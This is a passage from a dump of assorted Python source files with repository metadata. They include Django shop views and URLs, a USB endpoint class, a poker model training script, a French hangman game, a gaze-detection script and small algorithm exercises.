'items':items,\n 'order':order,\n 'cartItems':cartItems,\n }\n\n return render(request,\"store/checkout.html\",context)\n\n\ndef updateItem(request):\n data = json.loads(request.body)\n productId = data['productId']\n action =data['action']\n\n print('Action:',action)\n print('productId:',productId)\n\n customer =request.user.customer\n product = Product.objects.get(id=productId)\n order, created=Order.objects.get_or_create(customer=customer,complete=False)\n\n orderItem, created =OrderItem.objects.get_or_create(order=order,product=product)\n if action == 'add':\n orderItem.quantity =(orderItem.quantity + 1)\n elif action =='remove':\n orderItem.quantity =(orderItem.quantity - 1)\n\n orderItem.save()\n\n if orderItem.quantity <= 0:\n orderItem.delete()\n\n return JsonResponse('item was added',safe=False)\n\ndef processOrder(request):\n transaction_id = datetime.datetime.now().timestamp()\n data = json.loads(request.body)\n\n if request.user.is_authenticated:\n customer = request.user.customer\n order, created = Order.objects.get_or_create(customer=customer, complete=False)\n else:\n customer, order = guestOrder(request, data)\n\n total = float(data['form']['total'])\n order.transaction_id = transaction_id\n\n if total == float(order.get_cart_total):\n order.complete = True\n \n order.save()\n\n if order.shipping:\n try:\n \n shipping_address = ShippingAddress.objects.get(customer=customer)\n except ShippingAddress.DoesNotExist:\n shipping_address = None\n\n if shipping_address:\n # Update the existing shipping address\n shipping_address.address = data['shipping']['address']\n shipping_address.city = data['shipping']['city']\n shipping_address.state = data['shipping']['state']\n shipping_address.zipcode = data['shipping']['zipcode']\n else:\n # Create a new shipping address\n shipping_address = ShippingAddress(\n customer=customer,\n order=order,\n address=data['shipping']['address'],\n city=data['shipping']['city'],\n state=data['shipping']['state'],\n zipcode=data['shipping']['zipcode'],\n )\n shipping_address.save()\n\n return JsonResponse(\"payment complete\", safe=False)","repo_name":"ashinkj/shoppers-shoppy","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28471542199","text":"from concurrent.futures import ThreadPoolExecutor\nfrom tornado import gen\n\nthread_pool = ThreadPoolExecutor(2)\n\ndef mySleep(count):\n\timport time\n\tfor I in range(count):\n\t\ttime.sleep(1)\n\n@gen.coroutine\ndef call_blocking():\n\tprint(\"start of call_blocking\")\n\tyield thread_pool.submit(mySleep, 10)\n\tprint(\"end of call_blocking\")\n\nif __name__ == '__main__':\n\tcall_blocking()","repo_name":"haowenchao123/python_web","sub_path":"frames/Tornado/coroutine_pool.py","file_name":"coroutine_pool.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1972091276","text":"# Uses python3\nimport sys\nfrom math import floor\n\ndef binary_search(a, x, low=0, high=None):\n if high is None:\n high = len(a)\n\n mid = int(floor( low + (high - low) / 2. ) )\n \n if low > high or mid >= len(a):\n return -1 \n\n if a[mid] == x:\n return mid\n\n elif a[mid] > x:\n return binary_search(a,x,low, mid-1)\n elif a[mid] < x: \n return binary_search( a, x,mid+1,high )\n return -1\n\n\ndef linear_search(a, x):\n for i in range(len(a)):\n if a[i] == x:\n return i\n return -1\n\nif __name__ == '__main__':\n \n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n m = data[n + 1]\n a = data[1 : n + 1]\n for x in data[n + 2:]:\n # replace with the call to binary_search when implemented\n print(binary_search(a, x), end = ' ')\n ","repo_name":"leclair-7/Didactics","sub_path":"AlgorithmToolbox/week4_divide_and_conquer/1_binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4186921682","text":"from django.urls import path, re_path\nfrom haystack.forms import HighlightedSearchForm\nfrom goorchids.site import views\nfrom django.contrib.flatpages import views as flatpages_views\n\n\nurlpatterns = [\n # Home page\n path('', views.home_view, name='site-home'),\n path('location-suggestions/', views.location_suggestions_view,\n name='site-location-suggestions'),\n path('key-by-location/', views.redirect_to_simple_key_by_location),\n path('plant-name-suggestions/', views.plant_name_suggestions_view,\n name='plant-name-suggestions'),\n path('search-suggestions/', views.search_suggestions_view,\n name='site-search-suggestions'),\n\n # Search results\n path('search/',\n views.GoOrchidsSearchView(\n template='search.html',\n form_class=HighlightedSearchForm,\n ),\n name='search',\n ),\n re_path(r'family/(?P<family_slug>[a-z]+)/',\n views.family_view, name='site-family'),\n re_path(r'genus/(?P<genus_slug>[a-z]+)/',\n views.genus_view, name='site-genus'),\n re_path(r'species/(?P<genus_slug>[a-z]+)/(?P<epithet>[-a-z]+)/',\n views.species_view, name='site-species'),\n re_path(r'api/maps/(?P<genus>[^/-]+)-(?P<epithet>[^/]+)-na-state-distribution-map(\\.svg|/)',\n views.north_american_distribution_map,\n name='na-state-distribution-map'),\n path('about/', flatpages_views.flatpage, {'url': '/about/'}, name='site-about'),\n path('privacy/', flatpages_views.flatpage, {'url': '/privacy/'}, name='site-privacy'),\n path('terms-of-use/', flatpages_views.flatpage, {'url': '/terms-of-use/'}, name='site-terms-of-use'),\n]\n","repo_name":"jazkarta/goorchids-app","sub_path":"goorchids/site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37486224474","text":"# USBEndpoint.py\n#\n# Contains class definition for USBEndpoint.\n\nclass USBEndpoint:\n direction_out = 0x00\n direction_in = 0x01\n\n transfer_type_control = 0x00\n transfer_type_isochronous = 0x01\n transfer_type_bulk = 0x02\n transfer_type_interrupt = 0x03\n\n sync_type_none = 0x00\n sync_type_async = 0x01\n sync_type_adaptive = 0x02\n sync_type_synchronous = 0x03\n\n usage_type_data = 0x00\n usage_type_feedback = 0x01\n usage_type_implicit_feedback = 0x02\n\n def __init__(self, number, direction, transfer_type, sync_type,\n usage_type, max_packet_size, interval, handler):\n\n self.number = number\n self.direction = direction\n self.transfer_type = transfer_type\n self.sync_type = sync_type\n self.usage_type = usage_type\n self.max_packet_size = max_packet_size\n self.interval = interval\n self.handler = handler\n\n self.interface = None\n\n self.request_handlers = {\n 1 : self.handle_clear_feature_request\n }\n\n def handle_clear_feature_request(self, req):\n print(\"received CLEAR_FEATURE request for endpoint\", self.number,\n \"with value\", req.value)\n self.interface.configuration.device.maxusb_app.send_on_endpoint(0, b'')\n\n def set_interface(self, interface):\n self.interface = interface\n\n # see Table 9-13 of USB 2.0 spec (pdf page 297)\n def get_descriptor(self):\n address = (self.number & 0x0f) | (self.direction << 7) \n attributes = (self.transfer_type & 0x03) \\\n | ((self.sync_type & 0x03) << 2) \\\n | ((self.usage_type & 0x03) << 4)\n\n d = bytearray([\n 7, # length of descriptor in bytes\n 5, # descriptor type 5 == endpoint\n address,\n attributes,\n (self.max_packet_size >> 8) & 0xff,\n self.max_packet_size & 0xff,\n self.interval\n ])\n\n return d\n\n def send(self, data):\n dev = self.interface.configuration.device\n dev.maxusb_app.send_on_endpoint(self.number, data)\n\n def recv(self):\n dev = self.interface.configuration.device\n data = dev.maxusb_app.read_from_endpoint(self.number)\n return data\n\n","repo_name":"usb-tools/USBProxy-legacy","sub_path":"src/bindings/python/USBEndpoint.py","file_name":"USBEndpoint.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"48"} +{"seq_id":"40917459285","text":"from poker_simulation import Simulation \r\nfrom Texasholdem import env\r\nimport tensorflow as tf\r\nfrom tqdm import trange\r\nimport random\r\nfrom collections import deque\r\n\r\n\r\n# mae = tf.keras.losses.MeanAbsoluteError()\r\ncategorical_cross_entropy = tf.keras.losses.CategoricalCrossentropy()\r\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.001)\r\n\r\nenv = env(True)\r\nsim = Simulation()\r\nsimulation_num = 3000 #600\r\n\r\n# def one_hot_encoding(cards:list) -> list:\r\n# frame = [0 for i in range(52)] # 0 52개 리스트\r\n# def card_to_index(card:tuple) -> int:\r\n# num = card[0]*13 + card[1] - 1 # 2~A(14) # 13진법 -> 10진법\r\n# return num - 1 # index는 0부터 시작\r\n \r\n# for card in cards: frame[card_to_index(card)] = 1\r\n# return frame\r\n\r\n\r\nmodel = tf.keras.models.load_model('Trained_Model_08_21')\r\n\r\nreplaymemory = deque(maxlen=1000)\r\n\r\nnum = 600\r\nfor _ in trange(num):\r\n env() # 덱 초기화\r\n dataset = []\r\n\r\n start_money = 30\r\n my_money = start_money; opponent_money = start_money\r\n pot_size = 0; betting = 1\r\n\r\n community_card, human_hand, computer_hand = [], [] ,[]\r\n community_card = env.draw(community_card, 3)\r\n human_hand = env.draw(human_hand, 2); computer_hand = env.draw(computer_hand, 2)\r\n\r\n results = sim(num=simulation_num, community_card=community_card, my_hand=human_hand, opponent_hand=computer_hand, opponent_action_num=0, pot_size=pot_size, loss = 0, shape_to_num=True)\r\n if results == 1:\r\n betting *= 2\r\n pot_size += betting\r\n loss = -1*betting\r\n dataset.append([community_card, human_hand, computer_hand, results, betting, pot_size])\r\n\r\n action = random.choice([0, 1])\r\n if action == 0: # call\r\n # loss = -1*betting\r\n pot_size += betting\r\n elif action == 1: # raise\r\n betting *= 2\r\n # loss = -1*betting\r\n pot_size += betting\r\n results = sim(num=simulation_num, community_card=community_card, my_hand=human_hand, opponent_hand=computer_hand, opponent_action_num=action, pot_size=pot_size, loss = loss, shape_to_num=True)\r\n if results == 0 or results == 1: # call\r\n loss -= 2 # <<<\r\n pot_size += 2\r\n dataset.append([community_card, human_hand, computer_hand, 0, betting, pot_size])\r\n\r\n elif results == 2: # fold\r\n continue\r\n\r\n # action = random.choice([0, 2])\r\n # elif action == 2: # fold\r\n # continue\r\n\r\n betting = 1\r\n community_card = env.draw(community_card, 2)\r\n results = sim(num=simulation_num, community_card=community_card, my_hand=human_hand, opponent_hand=computer_hand, opponent_action_num=0, pot_size=pot_size, loss = 0, shape_to_num=True)\r\n if results == 1:\r\n betting *= 2\r\n pot_size += betting\r\n dataset.append([community_card, human_hand, computer_hand, results, betting, pot_size])\r\n for n, [cc, hh, ch, action, betting, pot_size] in enumerate(dataset):\r\n if action == 2: action = 0\r\n c_c = [i[1]-2 for i in cc]; h_h = [i[1]-2 for i in hh]; c_h = [i[1]-2 for i in ch]\r\n community_card = tf.one_hot(c_c, depth=13)\r\n if len(community_card) == 3:\r\n tensor = tf.constant([[0 for i in range(13)] for p in range(2)], dtype=tf.float32)\r\n community_card = tf.concat([community_card, tensor], axis=0)\r\n human_hand = tf.one_hot(h_h, depth=13)\r\n computer_hand = tf.one_hot(c_h, depth=13)\r\n action = tf.one_hot([action], depth=2)\r\n data = tf.concat([tf.reshape(community_card, (1, -1)), tf.reshape(computer_hand, (1, -1)), action], axis=1)\r\n label = tf.reshape(human_hand, shape=[1,-1])\r\n dataset[n] = [data, label]\r\n\r\n for i in dataset:\r\n replaymemory.append(i)\r\n\r\n if len(replaymemory) > 300: # 일정량 이상 데이터 쌓임\r\n batch_size = 16\r\n batch_data = random.sample(replaymemory, batch_size)\r\n \r\n train_x, train_y = [], []\r\n for data, label in batch_data:\r\n train_x.append(data)\r\n train_y.append(label)\r\n x_train = tf.reshape(tf.convert_to_tensor(train_x), [-1, 93])\r\n y_train = tf.reshape(tf.convert_to_tensor(train_y), [-1, 26])\r\n\r\n epochs = 4\r\n\r\n history = model.fit(\r\n x_train, y_train,\r\n batch_size=batch_size, epochs=epochs,\r\n )\r\n\r\n history.history\r\n # for _ in range(epochs):\r\n # for n, x in enumerate(train_x):\r\n # with tf.GradientTape() as tape:\r\n # tape.watch(model.trainable_weights)\r\n # prediction = model(x)\r\n # # loss = mae(train_y[n], prediction) \r\n # loss = categorical_cross_entropy(train_y[n], prediction) \r\n # gradients = tape.gradient(loss, model.trainable_weights)\r\n # optimizer.apply_gradients(zip(gradients, model.trainable_weights))\r\n\r\n# print(replaymemory)\r\nmodel.save('Trained_Model_number_08_20')","repo_name":"EricHW55/Poker-Bot","sub_path":"model_train_simulation.py","file_name":"model_train_simulation.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36033414734","text":"# -*- coding: utf-8 -*-\nimport random\nimport urllib.request\nimport os\nimport hashlib\nimport unicodedata\nfrom pathlib import Path\nfrom stat import S_IREAD, S_IRGRP, S_IROTH, S_IWUSR\n\n#question = 1\nword_length = 4 # minimum word length\ncustom_path_name = 'game_data' # path where word lists are stored\npoints_score_letter = 7\npoints_score_false = 3\n\ndef checksum(file_checksum, md5):\n hasher1 = hashlib.md5()\n afile1 = open(file_checksum, 'rb')\n buf1 = afile1.read()\n a = hasher1.update(buf1)\n md5_a = (str(hasher1.hexdigest()))\n # Base-checksum already defined on section 'selector'\n\n # Compare md5\n if md5_a != md5:\n print(md5_a)\n print(md5)\n print(\"Checksums WRONG \\n\")\n try:\n os.remove(file_checksum)\n except OSError as e: # if failed, report it back to the user #\n print(\"Error: %s - %s.\" % (e.filename, e.strerror))\n download()\n\ndef jeu():\n question = 0\n\n ####################################\n # Download and check the word list #\n ####################################\n\n # Selector to choose the type of the word to guess\n while True:\n print('Quel type de mot voulez-vous devinez ? (choisir par un chiffre entre 1-5)')\n print('1. Les noms')\n print('2. Les adjectifs')\n print('3. Les adverbes')\n print(\"4. Les verbes à l'infinitif\")\n choice = input(\"5. L'ensemble (dictionnaire)\\n> \")\n try:\n choice = int(choice)\n if choice > 5 or choice < 1:\n print(\"Valeur saisie non valide.\", end=\" \")\n continue\n else:\n break\n except ValueError:\n print(\"Valeur saisie non valide.\", end=\" \")\n continue\n\n # url list and checksums of original files\n if choice == 1:\n choice = 'nouns.txt'\n md5_b = 'bebdef79615cb1802e484cef6b7193e5'\n if choice == 2:\n choice = 'adjectives.txt'\n md5_b = 'cc863fa29842d9e3fb36c191f572ca12'\n if choice == 3:\n choice = 'adverbs.txt'\n md5_b = '06e80ad48aa32094ed7f1938759f853d'\n if choice == 4:\n choice = 'infinitives.txt'\n md5_b = '6d5edf8b0e0eefe725d10cf9c79cf055'\n if choice == 5:\n choice = 'dictionary.txt'\n md5_b = '72baa94546475f2e17a85b3f1134ec9c'\n\n url = 'https://github.com/Debian-10/French-Dictionary/raw/no-genders-types-indicators/dictionary/%s' % choice\n file_name = url.split('/')[-1]\n\n\n def download():\n u = urllib.request.urlopen(url, file_name.encode('utf_8'))\n file_size = eval(u.info()['Content-Length'])\n file_size = int(file_size / 1000)\n data = u.read()\n f = open(file_name, 'wb')\n f.write(data)\n f.close()\n\n # Check if the file already exists and his path\n cwd = os.getcwd()\n folder = os.path.join(cwd, custom_path_name)\n try:\n os.mkdir(folder)\n except OSError:\n print(\"\")\n else:\n print(\"\")\n my_file = Path(folder, file_name)\n os.chdir(folder)\n try:\n my_path = my_file.resolve(strict=True)\n except FileNotFoundError:\n # Download the wordlist\n download()\n else:\n print(\"\")\n\n #########################################\n # Ask player's name and check his score #\n #########################################\n\n os.chdir(folder)\n save_name = input('Entrez votre nom. ').title()\n\n\n # Checking of the checksum\n # Downloaded or already existing file\n checksum(my_file, md5_b)\n\n ####################\n # The Game himself #\n ####################\n\n def strip_accents(text):\n\n try:\n text = unicode(text, 'utf-8')\n except NameError: # unicode is a default on python 3\n pass\n\n text = unicodedata.normalize('NFD', text) \\\n .encode('ascii', 'ignore') \\\n .decode(\"utf-8\")\n\n return str(text)\n\n # Choose random word to guess\n c = 0\n c1 = 1\n noprint = 0\n existe = 0\n false = 0\n while True:\n word = random.choice(open(file_name).read().split()).strip()\n if len(word) > word_length:\n word = word\n length = len(word)\n break\n word = list(strip_accents(word))\n if \"-\" in word:\n word.remove(\"-\")\n hangman = (\n \"\"\"\n \n \n \n \n \n \n ___ \n \"\"\",\n\n \"\"\"\n \n | \n | \n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________\n |/ \n | \n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________\n |/ | \n | \n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________ \n |/ | \n | (_)\n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n ________ \n |/ | \n | (_) \n | | \n | | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________ \n |/ | \n | (_) \n | /| \n | | \n | \n | \n |___ \n \"\"\",\n\n\n \"\"\"\n _________ \n |/ | \n | (_) \n | /|\\ \n | | \n | \n | \n |___ \n \"\"\",\n\n\n \"\"\"\n ________ \n |/ | \n | (_) \n | /|\\ \n | | \n | / \n | \n |___ \n \"\"\",\n\n\n \"\"\"\n ________\n |/ | \n | (_) \n | /|\\ \n | | \n | / \\ \n | \n |___ \n \"\"\")\n\n print(\"Mot trouvé dans le dictionnaire...Le jeu commence !\\n \\n\")\n deja_saisie = []\n max_false = len(hangman) - 1\n guess = False\n hidden = []\n for i in range(0, length):\n hidden.append(\"*\")\n print(\"Le mot à deviner est :\", *hidden, sep=\" \")\n while guess == False:\n while True:\n c += 1\n if c>1 and noprint==0:\n print(*hidden, sep=\" \")\n print(hangman[false])\n print(\"Rentrez la lettre n°\",c1)\n choice1 = input(\"\\n> \")\n if choice1.isalpha() == True:\n if len(choice1) > 1:\n print(\"Trop de charactères saisis.\", end=\" \")\n continue\n else:\n break\n else:\n print(\"Valeur saisie non valide.\", end=\" \")\n noprint = 1\n continue\n\n if choice1 in word:\n for i in range(len(word)):\n if hidden[i] == choice1.upper():\n existe = 1\n break\n if word[i] == choice1:\n hidden[i] = choice1.upper()\n existe = 0\n if existe == 1:\n print(\"lettre déjà saisie !\")\n else:\n print(\"Lettre trouvée !\")\n c1 += 1\n noprint=0\n\n if choice1 not in word:\n if false < max_false and choice1 not in deja_saisie:\n print(\"Lettre non trouvée !\")\n deja_saisie.append(choice1)\n false += 1\n else:\n print(\"\")\n\n if \"*\" not in hidden:\n print(\"Et le mot est : \\n\")\n print(*hidden, sep=\" \")\n print(\"Vous avez gagné en\", c, \"tentatives ! \\n\")\n\n ################\n # Scores etc...#\n ################\n score_file = Path(folder, \"score\")\n try:\n score_path = score_file.resolve(strict=True)\n except FileNotFoundError:\n print(\"\")\n else:\n print(\"\")\n os.chmod(\"score\", S_IWUSR | S_IREAD)\n\n total_score = c1 * points_score_letter - false * points_score_false\n save_score = total_score\n meilleur = 0\n\n # look for highscore\n try:\n fichier = open(\"score\", \"r\")\n for line in fichier.readlines():\n\n line_parts = line.split(\" a un score de \")\n if len(line_parts) > 1:\n line_parts = line_parts[-1].split(\"\\n\")\n score = line_parts[0]\n # compare scores\n if score.isdigit() and int(score) > meilleur:\n meilleur = int(score)\n except FileNotFoundError:\n pass\n\n if int(save_score) > meilleur:\n fichier = open(\"score\", \"a\")\n fichier.write(\"\\n\" + str(save_name) + ' a un score de ' + str(save_score) + \"\\n\")\n fichier.close()\n\n print(\"\\n\")\n fichier = open(\"score\", \"r\")\n tout_lire = fichier.read()\n print(tout_lire)\n fichier.close()\n guess = True\n if max_false == false:\n print(hangman[false])\n print(\"Perdu ! le mot à deviner était :\", *word, sep=\" \")\n #question = 1\n guess = True\n #question = 1\n os.chmod(\"score\", S_IREAD)\n# Ask if player wants to play again\n#\n#while question == 1:\n# jouer = str(input(\"voulez-vous jouer ? (oui / non) \\n\"))\n# if jouer == \"oui\" or jouer == \"o\" or jouer == \"O\":\n# jeu()\n# elif jouer == \"non\" or jouer == \"n\" or jouer == \"N\":\n# input(\"Appuyez sur une touche pour continuer... \")\n# question = 0\njeu()","repo_name":"NewRedsquare/Python-ICN","sub_path":"Jeu ICN.py","file_name":"Jeu ICN.py","file_ext":"py","file_size_in_byte":10671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41287129993","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport math\n\nface_input = 'media/face.mp4'\nfront_input = 'media/front.mp4'\nface_output = 'output/face_outupt.mp4'\nfront_output = 'output/front_output.mp4'\nfps = 24\nsize = 0.5 #between 0 and 1\ndistance_from_center = 0 # +ve distance means below center, -ve distance means above center\nx_size = 100\nx_border = 200\nbrightness = 0\n\nx1,y1,x2,y2 = 0,0,0,0\niris_pos = ''\nLEFT_EYE = [362, 382, 381, 380, 374, 373, 390, 249, 263, 466, 388, 387, 386, 385,384, 398]\nRIGHT_EYE= [33, 7, 163, 144, 145, 153, 154, 155, 133, 173, 157, 158, 159, 160, 161 , 246] \nRIGHT_IRIS = [474, 475, 476, 477]\nLEFT_IRIS = [469, 470, 471, 472]\nL_H_LEFT = [33]\nL_H_RIGHT = [133]\nR_H_LEFT = [362]\nR_H_RIGHT = [263]\n\nmp_face_mesh = mp.solutions.face_mesh\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ndrawing_spec = mp_drawing.DrawingSpec(thickness=1,circle_radius=1)\n\ncv2.namedWindow('Face Camera', cv2.WINDOW_NORMAL)\ncv2.namedWindow('Front Camera', cv2.WINDOW_NORMAL)\nface_camera = cv2.VideoCapture(face_input)\nfront_camera = cv2.VideoCapture(front_input)\nif face_input == 0:\n face_camera.set(3,1280)\n face_camera.set(4,720) \nw1 = int(face_camera.get(3))\nh1 = int(face_camera.get(4)) \nw = int(front_camera.get(3))\nh = int(front_camera.get(4))\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout1 = cv2.VideoWriter(face_output,fourcc,fps,(w1,h1))\nout2 = cv2.VideoWriter(front_output,fourcc,fps,(w,h))\n\ncenter_y = h/2 + distance_from_center\nysize = h/2 * size\ntop_point_y = int(center_y - ysize)\nbottom_point_y = int(center_y + ysize)\n\n\ndef fillPolyTrans(img, points, color, opacity):\n list_to_np_array = np.array(points, dtype=np.int32)\n overlay = img.copy() # coping the image\n cv2.fillPoly(overlay,[list_to_np_array], color )\n new_img = cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0)\n # print(points_list)\n img = new_img\n cv2.polylines(img, [list_to_np_array], True, color,1, cv2.LINE_AA)\n return img\n\ndef euclidean_distance(point1, point2):\n x1,y1 = point1\n x2,y2 = point2\n distance = math.sqrt((x2-x1)**2 + (y2-y1)**2)\n return distance\n\ndef iris_position(iris_center, left_point, right_point):\n total_distance = euclidean_distance(left_point, right_point)\n center_to_right_distance = euclidean_distance(iris_center, right_point)\n ratio = center_to_right_distance / total_distance\n if ratio <= 0.4:\n iris_pos = 'RIGHT'\n elif ratio > 0.4 and ratio <= 0.6:\n iris_pos = 'CENTER'\n else:\n iris_pos = 'LEFT'\n return iris_pos, ratio\n\ndef landmarksDetection(img, results, draw=False):\n img_height, img_width = img.shape[:2]\n \n landmarks_list = [(int(point.x * img_width), int(point.y * img_height)) for point in results.multi_face_landmarks[0].landmark]\n if draw:\n [cv2.circle(img, p, 2, (0,255,0), -1) for p in landmarks_list]\n \n return landmarks_list\n\nwith mp_face_mesh.FaceMesh(\n max_num_faces=1,\n refine_landmarks=True,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as face_mesh:\n \n while face_camera.isOpened():\n ret1, frame1 = face_camera.read()\n ret2, frame2 = front_camera.read()\n if not ret1:\n print('Empty camera frame')\n break\n if not ret2:\n print('Empty fornt frame')\n break\n \n if face_input == 0:\n frame1 = cv2.flip(frame1,1)\n if brightness > 0:\n frame1 = np.int32(frame1) + brightness\n frame1 = np.clip(frame1, 0, 255)\n frame1 = np.uint8(frame1)\n frame1.flags.writeable = False\n frame1 = cv2.cvtColor(frame1,cv2.COLOR_BGR2RGB)\n results = face_mesh.process(frame1)\n \n frame1.flags.writeable = True\n frame1 = cv2.cvtColor(frame1,cv2.COLOR_RGB2BGR)\n\n if results.multi_face_landmarks:\n landmarks_list = landmarksDetection(frame1,results,draw=False)\n \n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in LEFT_EYE], (0,255,0), opacity=0.3)\n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in RIGHT_EYE], (0,255,0), opacity=0.3)\n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in LEFT_IRIS], (0,0,255), opacity=0.2)\n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in RIGHT_IRIS], (0,0,255), opacity=0.2)\n \n l_cx = int((landmarks_list[LEFT_IRIS[0]][0] + landmarks_list[LEFT_IRIS[2]][0])/2)\n l_cy = int((landmarks_list[LEFT_IRIS[1]][1] + landmarks_list[LEFT_IRIS[3]][1])/2)\n r_cx = int((landmarks_list[RIGHT_IRIS[0]][0] + landmarks_list[RIGHT_IRIS[2]][0])/2)\n r_cy = int((landmarks_list[RIGHT_IRIS[1]][1] + landmarks_list[RIGHT_IRIS[3]][1])/2)\n \n \n cv2.circle(frame1, (l_cx, l_cy), 4, (0,0,255), -1)\n cv2.circle(frame1, (r_cx, r_cy), 4, (0,0,255), -1)\n \n left_position, left_ratio = iris_position((l_cx,l_cy), landmarks_list[L_H_LEFT[0]], landmarks_list[L_H_RIGHT[0]])\n right_position, right_ratio = iris_position((r_cx,r_cy), landmarks_list[R_H_LEFT[0]], landmarks_list[R_H_RIGHT[0]])\n \n ratio = (left_ratio + right_ratio)/2\n ratio=round(ratio,3)\n \n if ratio <= 0.43:\n iris_pos = 'RIGHT'\n x1 = int(x_border)\n y1 = top_point_y\n x2 = int(w/3 - x_size)\n y2 = bottom_point_y\n elif ratio > 0.43 and ratio <= 0.57:\n iris_pos = 'CENTER'\n x1 = int(w/3 + x_size)\n y1 = top_point_y\n x2 = int(2*w/3 - x_size)\n y2 = bottom_point_y\n else:\n iris_pos = 'LEFT'\n x1 = int(2*w/3 + x_size)\n y1 = top_point_y\n x2 = int(w - x_border)\n y2 = bottom_point_y\n \n cv2.rectangle(frame2,(x1,y1),(x2,y2),(0,0,255),5) \n\n out1.write(frame1)\n out2.write(frame2)\n cv2.imshow('Face Camera', frame1)\n cv2.imshow('Front Camera', frame2)\n k = cv2.waitKey(1)\n if k == 27:\n break\nout1.release()\nout2.release()\nface_camera.release()\nfront_camera.release()\ncv2.destroyAllWindows()","repo_name":"bilalahmedm/mediapipe-gaze-detection","sub_path":"part2-gaze-detection.py","file_name":"part2-gaze-detection.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74905936786","text":"from Node import Node\n\nroot = Node(value=\"rrrbggg\", cost=0, level=0)\n\ntree = {} # for node traversal\nlevelValues = {} # for tree display purposes, needed values so legible to human readers\nlevelCount = {0: 1} # holds the number of nodes at each level\nneedToAdd = [] # used as queue to determine next node to evaluate\n\n\ndef createLevel(node):\n if not (node in tree):\n tree[node] = node.getChildren()\n count = 0\n for node in tree[node]:\n count += 1\n needToAdd.append(node)\n if node.level in levelCount:\n levelCount[node.level] += count\n else:\n levelCount[node.level] = count\n\n\nneedToAdd.append(root)\n\nwhile len(needToAdd) > 0:\n createLevel(needToAdd.pop(0))\n\nfor x in tree:\n if x.level in levelValues:\n levelValues[x.level].append(x.value)\n else:\n levelValues[x.level] = [x.value]\n\n\nprint(levelCount)\ni = 0\nfor x in levelValues:\n print(\"Level \" + str(i) + \": \" + str(levelValues[x]))\n i += 1\n\nfor x in tree:\n\ttmparr= []\n\tfor y in tree[x]:\n\t\ttmparr.append(y.value)\n\tif (len(tmparr) > 0):\n\t\tprint(\"Parent at Level \"+str(x.level)+\" : \"+x.value)\n\t\tprint(\"Children: \"+str(tmparr))\n\n\n","repo_name":"Dalton8804/AIHW3","sub_path":"TreeDisplay.py","file_name":"TreeDisplay.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28557624895","text":"\n'''\n文件组织目录如下:\n一级文件夹(组文件夹)\n 二级文件夹(人名文件夹:\"哈哈哈\")\n 二级文件夹\n PDF文件\n PDF文件\n\n1.给所有二级文件夹重命名:\"哈哈哈\"-->\"哈哈哈-1\",\"1\"是组文件夹名称\n'''\n\n# 导入os模块\nimport os\n# 从用户获取输入文件夹路径\ninput_path = input(\"请输入所有子文件夹所在的文件夹的路径:\")\n# 获取输入文件夹的名字\ninput_name = os.path.basename(input_path)\n# 遍历输入文件夹中的所有子文件夹\nfor folder in os.listdir(input_path):\n # 获取子文件夹的路径\n folder_path = os.path.join(input_path, folder)\n # 判断是否是文件夹\n if os.path.isdir(folder_path):\n # 获取新的文件夹名字,添加\"-\"和输入文件夹的名字\n new_name = folder + \"-\" + input_name\n # 获取新的文件夹路径\n new_path = os.path.join(input_path, new_name)\n # 重命名文件夹\n os.rename(folder_path, new_path)\n # 打印一条信息,记录重命名的情况\n print(f\"在{input_name}中,把{folder}重命名为{new_name}\")","repo_name":"gjingbaby/myCode","sub_path":"lf/V1/group_rename_folder.py","file_name":"group_rename_folder.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13755138705","text":"import sys\n\n\ndef solve():\n input = sys.stdin.readline\n\n str1 = str(input().strip())\n str2 = str(input().strip())\n N = len(str1)\n M = len(str2)\n dp = [[0 for _ in range(M + 1)] for _ in range(N + 1)]\n check = [[0 for _ in range(M + 1)] for _ in range(N + 1)]\n\n for i in range(0, N):\n for j in range(0, M):\n if (str1[i] == str2[j]):\n dp[i + 1][j + 1] = dp[i][j] + 1\n check[i][j] = 1\n else:\n dp[i + 1][j + 1] = max(dp[i][j + 1], dp[i + 1][j])\n\n x = N\n y = M\n ans = []\n while (1):\n if (dp[x][y] == 0):\n break\n if (check[x - 1][y - 1] == 1):\n ans.append(str1[x - 1])\n x -= 1\n y -= 1\n else:\n 